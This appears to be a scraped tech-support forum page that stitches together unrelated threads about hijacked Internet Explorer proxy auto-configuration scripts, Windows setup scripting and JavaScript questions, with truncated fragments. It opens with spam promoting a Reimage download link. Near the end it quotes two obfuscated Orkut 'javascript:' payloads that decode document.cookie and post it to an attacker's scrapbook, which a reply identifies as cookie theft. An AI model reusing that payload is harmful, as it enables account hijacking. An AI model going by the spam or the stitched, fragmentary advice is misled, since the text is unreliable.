Java script in "Use automatic configuration script"

Q: Java script in "Use automatic configuration script"

Hi All

This script was found in LAN settings, can anyone tell me what it will do? I Googled SIZLSearch and found it is adware. I wish I was better at programming.

file://C:\Program Files (x86)\SIZLSearch\bin\PAC9064.js

Thanks, Doug

Preferred Solution: Java script in "Use automatic configuration script"

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

I can't turn off automatic configuration script in Internet Explorer. Actualy, I can uncheck it but once I close IE and reopen, it comes back on. This forces me to go to "tools", "connection", "LAN setting" and unckecking ACS every time I want to connect to the net.
I used to have cable ISP called [email protected] and they used AutoCS(http://proxy:8080 it's still there and I can't removeit).
Does IE have any files hold this kind of information like registry, win.ini or system.ini in win9x? I think I have to go down to that level to fix this problem.
Help me!

A:automatic configuration script on IE5

registries a good bet
look for anything named after the cable company
delete it, it is said to be careful in the registry, but only a complete mong could mess it up.
Also look in the registry underlocalmachine/software/microsoft/internetexplorer(maybeIE4/5/)and see if there is anything there also with the same name.
Delete it.
Also run find, again looking for the name, .
If that doesn't work my last but probably not a very good suggestion would be
get a program like driver detective www.driverhq.com
And use it to show u all the .dll files that IE uses and look through them for traces of any associations.
This is very long winded, and will take days.
And most of it will probably be encrypted.

does this help at all

Hi, I am interested in finding out if it is possible (well I'm sure it is, what I really need is how I might go about doing it) to create a script that will go and automatically configure a freshly imaged laptop its WiFi settings to connect to my school's network. In essence what the script needs to do is add a network that it will automatically join with its SSID, set it to WPA-TKIP, and PEAP. Also in addition to that it would be nice if the script could also have the ability to install the network's Certs, attach it to the domain, and configure power settings for the Wireless card (though I already have a method for doing that).

So I'm just wondering if anyone has an idea on how I would go about making such a script that would do all those things. If you could just point me in the right direction, that would be a great help. I've done some searching for this, but so far I have no come out with anything very helpful.

Thanks again.

Alright, here's the low-down of what I'm trying to accomplish.
We have proxy setup on the network to gain access to the internet. Internet options is not accessible to view what the automatic configuration script is set to. Is there an alternate way to view what is currently entered into the automatic configuration script text box without having to actually go into IE options? Also, the computer has limited rights making it impossible to access windows explorer. I'm leaning towards possibly a web application that can read the contents of the IE options fields or something similar. Cannot install software on computer again due to limited rights on it. Any feedback on how this can be achieved would be great.

I've downloaded the file and it keeps me off Google and Bing. Life without Google for me (a college student) is pretty hard!
How can I delete it? It keeps reappearing no matter what I do.

Please help!

I am unable to uncheck the "use automatic connection script" setting in INTERNET OPTIONS > CONNECTIONS> LAN SETTINGS.

History: my problem began when Google Chrome displayed in the lower bar "resolving proxy". This delays being able to use the Internet for 15 or 20 seconds as the browser tries to resolve the proxy. The same delays occur in Internet Explorer and Firefox as all three browsers use the same Internet options settings.

As I tried to resolve this problem, Internet searches referred me to Internet options and suggested that I unclick the "automatically detect settings" checkbox as well as the "use automatic connection script" checkbox. I tried to do that. It is impossible to do so. I can, apparently, uncheck the boxes but the setting is not savable and the boxes remain checked no matter what.

After much searching on forms I am stumped.

I created a new user for the computer and when in that user the internet options are: "automatically detect settings" - checked; "use automatic connection script" - unchecked. And, the resulting proxy issue does not exist and I am back to fast browsing. But naturally, I need to use my user profile not the one I made up to test the situation.

In the "use automatic connection script" settings the script is "http://dll.sslsecurity.info:8089/config.pac".

Can someone please help me locate and remove whatever is overwriting my ability... Read more

Good day.
I work in an enterprise environment with IE11 and Google Chrome as available browsers. IE11 is configured with an automatic configuration script. On all computers but one, it works as expected.
On the problem machine I (and all other users) can access intranet sites but not internet sites while using IE11. If I remove the script name and enter the IP/Port of the proxy server in the proxy section, it works as expected. Google Chrome works as
expected and pulls the .pac info from IE. Chrome works whether the script or IP are used.
I have run GPUPDATE /FORCE, restarted the computer, run IE with no add-ons, reset IE settings (from the advanced tab on Internet Options), flushed the DNS, renewed the IP, tried accessing websites by IP rather than name.

Any help is greatly appreciated.
Thanks,
Liam

Version of IE - Internet Explorer 6.0 or 7.0

Operating System - Windows XP SP2

What you have tried - Manually reentering the script location

What the problem is - Automatic Configuration Script randomly drops out of Internet Explorer

Give detail explaining your problem - The Automatic Configuration Script checkbox is ticked and the path to the script has been entered however it randomly drops off on some PCs/laptops sometimes and then the users are unable to browse on the Internet. Manually reentering the details temporarily resolves the issue but the the entries have still been known to drop off afterwards. This is extremely annoying especially on remote PCs. If this has happened to anyone before, any information would be greatly appreciated.

My girlfriend's laptop is having some issues. (I use LogMeIn to remotely do "tech support" for her since she is relatively computer illiterate)She is on a college network. Starting today, she was having a few problems:#1. If she clicks the IE link on the desktop IE opens, then closes itself before it has a chance to load the homepage.#2. If she selects Windows Update from the start menu, IE will open (and actually stay open), but she is redirected to www.msn.com (This is what led me to #3)#3. I noticed in her Internet Options > Connections > LAN Settings, that "Use automatic configuration script" was selected and 'http://localhost:9100/proxy.pac" was in the address bar. Did a little googling to try to find a solution, but to no avail. #4. She can access the internet perfectly fine through Google Chrome or Mozilla Firefox, BUT she cannot go to the college's email or "student portal". (My guess is that when she's on the schools network, it would normally reroute her to direct access instead of going over the internet? And because of the config script, it doesn't know to reroute properly??? Just an idea). Here is her HJT log:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 7:19:34 PM, on 11/7/2008Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16705)Boot mode: NormalRunning processes:C:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system... we dont have connections tab in internet explorer settings due to restrictions. is it possible to enable that use automatic configuration script option without having the connection tab? i know we can set the proxy server from registry key "auto config
URL" key. but there is no registry key to disable the "automatically detect settings" and enable the second checkbox.

I have a laptop (Windows 98SE) connected wirelessly to a router.

In Internet Options/Connections/LAN Settings the box for "use automatic configuration script" is always checked when I startup even if I uncheck it and click OK.

Under the same tab in "Dial-Up and Virtual Private Network Settings" there are three items listed. Clicking on the "Remove" button does nothing.

The router's manual suggests having all the LAN settings' boxes unchecked.

How do I make the "use automatic configuration script" box stay unchecked, upon startup?

Thanks

Yesterday Internet Explorer would not connect. I noticed for some reason the Use Automatic Configuration Script setting in LAN Settings was set to 127.0.0.1:2309/proxyconf. After several tries. I reset it to the correct setting Automatically Detect Settings and IE now works. I've done a full virus scan with Kapersky Internet Security and Malwarebytes but found nothing.

Please advise:
Why would the Automatic Configuration Script be changed and what is the setting 127.0.0.1:2309/proxyconf?Is there a Group Policy or Registry setting to disable the Automatic Configuration Script option?I have a long list of Intermediate Certification Authorities and I'm unsure what they all are. I'm also unable to remove them. Is there a way of resetting IE to a standard set of certificates a new Windows installation would have?

A:"Use Automatic Configuration Script Setting" in IE

That could easily have been done by a trojan (which is different from a virus or other malware) which may have been picked up in a previous sweep or just managed to elude Kaspersky.

As for your other questions, while kind of a sideways answer, you'd be better off just picking Firefox or Chrome and forgetting about IE save those few sites which absolutely do not work with anything else. MS has made significant strides in recent years, but the fact still remains that IE is probably the single most exploited program ever created and short of rewriting the entire thing from the ground up and being willing to break who knows how many corporate intranets and other things, there's just no way to fix it. Someone will probably be able to address those issues directly, but long-term using Internet Explorer for any amount of time is exceedingly dangerous, so you should try and limit it to only those times when it is absolutely necessary. Meaning times when you need to get to some site and there's no other site you can go to to get the same content. Sadly, and rather inexcusably, that is often banking sites, but I digress. The rest of the time, use Firefox or Chrome, your choice which you want to use. Each has good and bad points about it, but among the good points is security that is worlds better than IE.

Hi there,

I've been having a problem connecting to a website, after further research I realized the problem came from the fact that automatic configuration script was checked in under the LAN settings with this address: http://127.0.0.1:6853/wpad.pac?stamp=87

However i can't uncheck it as it keeps checking itself back. I tried entering the address but it then asked me to download a file so no.

I looked at other forum posts and tried using the registry editor to locate the problem
in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings.

I found these values for Proxy enable and ProxyHttp
ProxyEnable 0x00000000(0)
ProxyHttp1.1 0x00000000(1)

However I didn't find anything for Proxy server but there is an AutoConfigURL to the previous address which I deleted. The problem is however still there and i'm running out of options so any help would be greatly appreciated !

just want to make sure they are not legit before we remove them.

Last you can go here: C:\Users\Antariksh\AppData\Roaming\msregsvv.dll

Yes, I wanted the system to be as light as possible, now I know that by deleting the ei.cfg file I can install any version of windows, so the question is:

How much real wolrd improvement will there be by installing Home Basic instead of Ultimate?

The other question, it takes me years for me to completely configure windows once installed, things like these:

DISABLE
system restore
aero
windows update
all security and maintenance options
all that can be found in action center
user account control
windows firewall
language bar
etc

MODIFY
power options
taskbar options
add quicklaunch
performance settings
virtual memory location
and MAAAANY other things

Is there any way to make a script that I can run so these things are done automatically? I give maintenance to my friend's, family's computers, so sometimes I have 4 or 5 computers laying around, and configuring these settings is what takes most of the time. So double clicking a bat file would make my life easier.

Thanks in advance!

Very, very little. Plus, you have to obtain a key for Windows 7 Home Basic...you cannot use your Ultimate key with it.

I would not disable system restore (just set to low %), I would not disable Windows updates. I would not turn of user access control or the Windows firewall. Seriously, test your tweaks with a stopwatch and I bet you will be surprised by how little a difference it actually makes.

What I would do if I were you, is get your machine installed, configured and set the way you want it. Then, use something like Macrium Reflect free edition and make an image of your hard drive. Then if you are in need of starting over, you can simply restore the image and you will be right back where you left off.

This is not a job for javascript, sorry. You are going to need a serverside programming language (PHP, Perl, ASP) and you are going to have to learn how to use it.

I assume that you mean "enable" as in a web browser ? (Internet Explorer, Firefox, Opera...)

Depends on which browser you are using.

Give me your browser details.

JavaScript (which is different to Sun Java) is usually included in your browser, not as a separately installed program like Sun. If you go here; http://www.javatester.org/ and click on the orange 'JavaScript' box on the left of the page, it should confirm if JS is working in your browser and will also name the browser and JS version (I think Firefox is 1.8 or 9 while IE is 1.3).

If the test doesn't work with either browser it's possible that their settings have been adjusted to not allow it, or you have something blocking it from running, such as a popup blocker.

Javascript and java are 2 totally different animals.

Scripting is used on most sites for extra functions..............java is mostly 99% un-needed and totally insecure and should be disabled or even uninstalled if not used.
Are your speakers working properly, you may have to reinstall the audio driver.

So I went to the Java website and tried to download the free download. I thought I had met all the requirements. I know I have WinXP Home, but how do I check processor speed and availiable RAM??

A:Java Script

Go To Start | Control Panel | System | General Tab
It should tell you in the Computer section

The fact, though, that your computer is capable of running XP Home tells me that it is capable of running the Java Virtual Machine, so you can go ahead and download it

to start of...
1stly - i dont know java scripting...
2ndly - i'm a member of orkut and i have a community [that i've removed recently]
.
now a few ppl are scrapping me telling me to put certain javascripts in my scrapbook to prevent anyone hacking my accountand to increase the number of members in my account and also to ban spammers.
.
two ppl have sent me these scripts:
javascript: orkut=replyForm;orkut.toUserId.value=73325625;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action='Scrapbook.aspx?Action.writeScrapBasic';orkut.submit()
and
javascript:maddy=replyForm;maddy.toUserId.value=74660961;maddy.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));maddy.action='Scrapbook.aspx?Action.writeScrapBasic';maddy.submit()
.
now there is definitely something wrong. how will this help prevent anyone from hacking my account or especially increase my community members by 10000, just by putting this script in MY scrapbook?
and wat has my scrapbook got to do with my community?
.
crap! something is fishy but i have no idea what this script does.
does anyone know?

A:wat does this JAVA script do?

I'm no Orkut or JavaScript wizard, but it looks like they are stealing your Orkut cookies. I would guess this would let them log in as you.

BTW, JavaScript has got absolutely nothing to do with Java

Can someone please help this "low tech" guy?

I tried opening a website which I've used dozens of times and got this message: " You were blocked from www.guidestar.org earlier today as your web browser failed to properly execute JavaScript. www.guidestar.org requires that users use a JavaScript-enabled web browser when accessing their website.

Turning JavaScript on in your browser will allow you to access www.guidestar.org without any further issues. If JavaScript is enabled, please make sure you are using the most up-to-date version of your web browser and that no third-party plugins are blocking the "Distil Networks" JavaScript..."

Can someone explain (in plain English!) what this means and what I have to do? Thank you very much.

In IE, go to Tools-Internet Options and then the security tab. Make sure you ENABLE a bunch of the stuff in there. Also, go to the Advanced tab, all the way down to the bottom under VM, you might want to check all the java stuff.
